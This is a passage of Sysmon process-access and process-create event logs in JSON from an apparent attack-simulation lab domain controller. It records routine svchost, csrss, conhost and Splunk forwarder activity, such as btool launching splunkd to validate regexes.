05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3389,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3390,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3391,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3392,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-020E-5F25-0000-001035E50400}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-020E-5F25-0000-001035E50400}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3393,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.359\r\nProcessGuid: {A837DB8D-023B-5F25-0000-001053400500}\r\nProcessId: 4420\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-023B-5F25-0000-0010A03F0500}\r\nParentProcessId: 4552\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.359","ProcessGuid":"{A837DB8D-023B-5F25-0000-001053400500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-023B-5F25-0000-0010A03F0500}","ParentProcessId":"4552","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3394,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-023B-5F25-0000-0010A03F0500}\r\nSourceProcessId: 4552\r\nSourceThreadId: 4600\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001053400500}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-023B-5F25-0000-0010A03F0500}","SourceProcessId":"4552","SourceThreadId":"4600","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001053400500}","TargetProcessId":"4420","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3395,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-001053400500}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-001053400500}","TargetProcessId":"4420","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3396,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3397,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 